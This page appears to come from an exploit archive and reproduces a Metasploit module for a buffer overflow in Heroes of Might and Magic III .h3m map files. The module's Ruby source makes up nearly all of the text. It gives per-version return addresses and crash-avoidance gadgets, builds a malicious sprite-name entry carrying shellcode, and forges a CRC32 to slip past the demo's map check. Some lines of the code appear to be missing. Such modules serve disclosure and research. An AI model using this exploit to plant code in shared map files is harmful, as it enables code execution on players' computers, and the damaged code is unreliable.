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Heroes Of Might And Magic III .h3m Map File Buffer Overflow

Heroes Of Might And Magic III .h3m Map File Buffer Overflow
Posted Aug 4, 2015
Authored by Pierre Lindblad, John AAkerblom | Site metasploit.com

This Metasploit module embeds an exploit into an uncompressed map file (.h3m) for Heroes of Might and Magic III. Once the map is started in-game, a buffer overflow occurring when loading object sprite names leads to shellcode execution.

tags | exploit, overflow, shellcode, code execution
SHA-256 | 5f3f3372c7b7ed5f4f8756063b78d1e2135c986738b9fc08143adf4c5746a07f

Heroes Of Might And Magic III .h3m Map File Buffer Overflow

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# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core'
require 'zlib'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::FILEFORMAT

def initialize(info = {})
'Name' => 'Heroes of Might and Magic III .h3m Map file Buffer Overflow',
'Description' => %q{
This module embeds an exploit into an ucompressed map file (.h3m) for
Heroes of Might and Magic III. Once the map is started in-game, a
buffer overflow occuring when loading object sprite names leads to
shellcode execution.
'License' => MSF_LICENSE,
'Author' =>
'Pierre Lindblad', # Vulnerability discovery
'John AAkerblom' # Vulnerability discovery, PoC and Metasploit module
'References' =>
[ 'EDB', '37716' ]
'DefaultOptions' =>
'EXITFUNC' => 'process'
'Platform' => 'win',
'Targets' =>
'H3 Complete [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]',
# Two "Anticrash"-gadgets are needed or the game will crash before ret
# Anticrash1, needs to pass the following code down to final JMP:
# MOV EAX, DWORD PTR DS : [ESI + 4] ; [Anticrash1 + 4]
# JE SHORT <crash spot> ; JMP to crash if EAX is 0
# JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0
# JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0xFF
# JNE <good spot> ; JMP to good spot. Always occurs if we get this far
# Summary: An address which when incremented by 4 and then dereferenced
# leads to for example a string which is preceeded neither by a 0x00 or 0xFF
'Anticrash1' => 0x004497D4,
# Anticrash2, needs to return out of the following call (tricky):
# MOV EAX, DWORD PTR DS : [ECX] ; [Anticrash2]
# CALL DWORD PTR DS : [EAX + 4] ; [[Anticrash2] + 4]
# Summary: An address which when dereferenced leads to an address that
# when incremented by 4 and then deferenced leads to a function returning
# without accessing any registers/memory that would cause a crash.
'Anticrash2' => 0x006A6430,
'Ret' => 0x004EFF87, # CALL ESP Heroes3.exe
'Padding' => 121 # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
'HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]',
'Anticrash1' => 0x00456A48,
'Anticrash2' => 0x006A6830,
'Ret' => 0x00580C0F, # CALL ESP Heroes3 HD.exe
'Padding' => 121 # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
'Heroes III Demo [h3demo.exe 522B6F45F534058D02A561838559B1F4]',
# The two anticrash gadgets are accessed in reverse order for this target,
# meaning that the documentation above for Anticrash1 applies to Anticrash2
# here. However, Anticrash1 here is accessed differently than the other targets.
# Anticrash1, needs to pass the following code:
# CMP BYTE PTR SS:[EBP+5C], 72 ; [Anticrash1 + 0x5C]
# JNE 00591F37
# MOV EAX,DWORD PTR SS:[EBP+38] ; [Anticrash1 + 0x38]
'Anticrash1' => 0x00580C0F, # Coincidentally the Ret value from HD Mod target
# Anticrash2, see documentation for Anticrash1 (not 2) in H3 Complete target
'Anticrash2' => 0x005CE200,
'Ret' => 0x0043EAB1, # CALL ESP h3demo.exe
'Padding' => 109, # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
'CRC32' => 0xFEEFB9EB
'Privileged' => false,
'DisclosureDate' => 'Jul 29 2015',
'DefaultTarget' => 0))

'If file exists, exploit will be embedded' \
' into it. If not, a new default h3m file where' \
' it will be embedded will be created.',
], self.class)

def exploit
buf = ''

# Load h3m into buffer from uncompressed .h3m on disk/default data
buf << read_file(datastore['FILENAME'])
print_status('File ' + datastore['FILENAME'] + ' exists, will embed exploit if possible')
rescue Errno::ENOENT
print_warning('File ' + datastore['FILENAME'] + ' does not exist, creating new file from ' \
'default .h3m data')
buf << make_default_h3m

# Find the object attributes array in the file by searching for a sprite name that occurs
# as the first game object in all maps.
objects_pos = buf.index('AVWmrnd0.def')
if objects_pos.nil?
print_error('Failed to find game object section in file ' + datastore['FILENAME'] + \
'. Make sure this file is an uncompressed .h3m (and has not yet had exploit embedded)')

# Entries in the objects array start with a string size followed by game sprite name string
# Move back 4 bytes from the first sprite name to get to the start of the objects array
objects_pos -= 4

print_good('Found object attributes array in file at decimal offset ' + objects_pos.to_s)

# Construct a malicious object entry with a big size, where the sprite name starts
# with a NULL terminator and 6 extra 0x00 bytes. The first 2 of those 6 can be anything,
# but certain values for the last 4 will cause the CALL-ESP gadget address to be overwritten.
# After the 7 0x00 bytes comes 121 bytes of random data and then the CALL ESP-gadget for
# overwriting the saved eip. Finally two "anticrash gadgets" that are used by the game before
# it returns to the CALL ESP-gadget are required for the game not to crash before returning.
size = 7 + target['Padding'] + 4 + 4 + 4 + payload.encoded.size
exp = ''
exp << [size].pack('V')
exp << "\x00" * 7 # The first byte terminates string, next 2 dont matter, last 4 need to be 0
exp << rand_text(target['Padding'])
exp << [target.ret].pack('V')
exp << [target['Anticrash1']].pack('V')
exp << [target['Anticrash2']].pack('V')
exp << payload.encoded

# Embed malicious object entry. It is okay if we overwrite the rest of the file and extend buf
from = objects_pos
to = from + size
buf[from..to] = exp
print_good('Embedded exploit between decimal file offsets ' + from.to_s + ' and ' + to.to_s)

# Demo version has a crc32 check to disallow other maps than the one it comes with.
if target['CRC32']
buf = forge_crc32(buf, target['CRC32'])
if Zlib.crc32(buf) == target['CRC32']
print_good('Forged CRC32 to 0x%08X by adding 4 bytes at end of file' % target['CRC32'])
print_error('Failed to forge CRC32')

# Write the uncompressed exploit .h3m (the game can load uncompressed .h3ms)

def substring_pos(string, substring)
string.enum_for(:scan, substring).map { $~.offset(0)[0] }

# Loads a file
def read_file(fname)
buf = ''
::File.open(fname, 'rb') do |f|
buf << f.read


# Returns data for a minimimum required S size h3m map containing 2 players
def make_default_h3m
buf = ''

# Set map specifications to 36x36 (0x24000000) map with 2 players, with
# default/no settings for name, description, victory condition etc
buf << "\x0e\x00\x00\x00\x01\x24\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
buf << "\x00\x00\x01\x01\x01\x00\x01\x00\x00\x00\xff\x01\x01\x00\x01\x00"
buf << "\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x8c"
buf << "\x00\x00\xff\x00\x00\x00\x00\xb1\x00\x00\xff\x00\x00\x00\x00\x00"
buf << "\x00\x00\xff\x00\x00\x00\x00\x7f\x00\x00\xff\x00\x00\x00\x00\x48"
buf << "\x00\x00\xff\xff\xff\x00"
buf << "\xFF" * 16
buf << "\x00" * 35

# Each tile is 7 bytes, fill map with empty dirt tiles (0x00)
buf << "\x00" * (36 * 36 * 7)

# Set object attribute array count to 1
buf << "\x01\x00\x00\x00"

# Size of first sprite name, this will be overwritten
buf << "\x12\x34\x56\x78"

# Standard name for first object, which will be searched for
buf << 'AVWmrnd0.def'


# Forge crc32 by adding 4 bytes at the end of data
# http://blog.stalkr.net/2011/03/crc-32-forging.html
def forge_crc32(data, wanted_crc)
crc32_reverse = [
0x00000000, 0xDB710641, 0x6D930AC3, 0xB6E20C82,
0xDB261586, 0x005713C7, 0xB6B51F45, 0x6DC41904,
0x6D3D2D4D, 0xB64C2B0C, 0x00AE278E, 0xDBDF21CF,
0xB61B38CB, 0x6D6A3E8A, 0xDB883208, 0x00F93449,
0xDA7A5A9A, 0x010B5CDB, 0xB7E95059, 0x6C985618,
0x015C4F1C, 0xDA2D495D, 0x6CCF45DF, 0xB7BE439E,
0xB74777D7, 0x6C367196, 0xDAD47D14, 0x01A57B55,
0x6C616251, 0xB7106410, 0x01F26892, 0xDA836ED3,
0x6F85B375, 0xB4F4B534, 0x0216B9B6, 0xD967BFF7,
0xB4A3A6F3, 0x6FD2A0B2, 0xD930AC30, 0x0241AA71,
0x02B89E38, 0xD9C99879, 0x6F2B94FB, 0xB45A92BA,
0xD99E8BBE, 0x02EF8DFF, 0xB40D817D, 0x6F7C873C,
0xB5FFE9EF, 0x6E8EEFAE, 0xD86CE32C, 0x031DE56D,
0x6ED9FC69, 0xB5A8FA28, 0x034AF6AA, 0xD83BF0EB,
0xD8C2C4A2, 0x03B3C2E3, 0xB551CE61, 0x6E20C820,
0x03E4D124, 0xD895D765, 0x6E77DBE7, 0xB506DDA6,
0xDF0B66EA, 0x047A60AB, 0xB2986C29, 0x69E96A68,
0x042D736C, 0xDF5C752D, 0x69BE79AF, 0xB2CF7FEE,
0xB2364BA7, 0x69474DE6, 0xDFA54164, 0x04D44725,
0x69105E21, 0xB2615860, 0x048354E2, 0xDFF252A3,
0x05713C70, 0xDE003A31, 0x68E236B3, 0xB39330F2,
0xDE5729F6, 0x05262FB7, 0xB3C42335, 0x68B52574,
0x684C113D, 0xB33D177C, 0x05DF1BFE, 0xDEAE1DBF,
0xB36A04BB, 0x681B02FA, 0xDEF90E78, 0x05880839,
0xB08ED59F, 0x6BFFD3DE, 0xDD1DDF5C, 0x066CD91D,
0x6BA8C019, 0xB0D9C658, 0x063BCADA, 0xDD4ACC9B,
0xDDB3F8D2, 0x06C2FE93, 0xB020F211, 0x6B51F450,
0x0695ED54, 0xDDE4EB15, 0x6B06E797, 0xB077E1D6,
0x6AF48F05, 0xB1858944, 0x076785C6, 0xDC168387,
0xB1D29A83, 0x6AA39CC2, 0xDC419040, 0x07309601,
0x07C9A248, 0xDCB8A409, 0x6A5AA88B, 0xB12BAECA,
0xDCEFB7CE, 0x079EB18F, 0xB17CBD0D, 0x6A0DBB4C,
0x6567CB95, 0xBE16CDD4, 0x08F4C156, 0xD385C717,
0xBE41DE13, 0x6530D852, 0xD3D2D4D0, 0x08A3D291,
0x085AE6D8, 0xD32BE099, 0x65C9EC1B, 0xBEB8EA5A,
0xD37CF35E, 0x080DF51F, 0xBEEFF99D, 0x659EFFDC,
0xBF1D910F, 0x646C974E, 0xD28E9BCC, 0x09FF9D8D,
0x643B8489, 0xBF4A82C8, 0x09A88E4A, 0xD2D9880B,
0xD220BC42, 0x0951BA03, 0xBFB3B681, 0x64C2B0C0,
0x0906A9C4, 0xD277AF85, 0x6495A307, 0xBFE4A546,
0x0AE278E0, 0xD1937EA1, 0x67717223, 0xBC007462,
0xD1C46D66, 0x0AB56B27, 0xBC5767A5, 0x672661E4,
0x67DF55AD, 0xBCAE53EC, 0x0A4C5F6E, 0xD13D592F,
0xBCF9402B, 0x6788466A, 0xD16A4AE8, 0x0A1B4CA9,
0xD098227A, 0x0BE9243B, 0xBD0B28B9, 0x667A2EF8,
0x0BBE37FC, 0xD0CF31BD, 0x662D3D3F, 0xBD5C3B7E,
0xBDA50F37, 0x66D40976, 0xD03605F4, 0x0B4703B5,
0x66831AB1, 0xBDF21CF0, 0x0B101072, 0xD0611633,
0xBA6CAD7F, 0x611DAB3E, 0xD7FFA7BC, 0x0C8EA1FD,
0x614AB8F9, 0xBA3BBEB8, 0x0CD9B23A, 0xD7A8B47B,
0xD7518032, 0x0C208673, 0xBAC28AF1, 0x61B38CB0,
0x0C7795B4, 0xD70693F5, 0x61E49F77, 0xBA959936,
0x6016F7E5, 0xBB67F1A4, 0x0D85FD26, 0xD6F4FB67,
0xBB30E263, 0x6041E422, 0xD6A3E8A0, 0x0DD2EEE1,
0x0D2BDAA8, 0xD65ADCE9, 0x60B8D06B, 0xBBC9D62A,
0xD60DCF2E, 0x0D7CC96F, 0xBB9EC5ED, 0x60EFC3AC,
0xD5E91E0A, 0x0E98184B, 0xB87A14C9, 0x630B1288,
0x0ECF0B8C, 0xD5BE0DCD, 0x635C014F, 0xB82D070E,
0xB8D43347, 0x63A53506, 0xD5473984, 0x0E363FC5,
0x63F226C1, 0xB8832080, 0x0E612C02, 0xD5102A43,
0x0F934490, 0xD4E242D1, 0x62004E53, 0xB9714812,
0xD4B55116, 0x0FC45757, 0xB9265BD5, 0x62575D94,
0x62AE69DD, 0xB9DF6F9C, 0x0F3D631E, 0xD44C655F,
0xB9887C5B, 0x62F97A1A, 0xD41B7698, 0x0F6A70D9

# forward calculation of CRC up to pos, sets current forward CRC state
fwd_crc = 0xffffffff
data.each_byte do |c|
fwd_crc = (fwd_crc >> 8) ^ Zlib.crc_table[(fwd_crc ^ c) & 0xff]

# backward calculation of CRC up to pos, sets wanted backward CRC state
bkd_crc = wanted_crc ^ 0xffffffff

# deduce the 4 bytes we need to insert
[fwd_crc].pack('<L').each_byte.reverse_each do |c|
bkd_crc = ((bkd_crc << 8) & 0xffffffff) ^ crc32_reverse[bkd_crc >> 24] ^ c

res = data + [bkd_crc].pack('<L')
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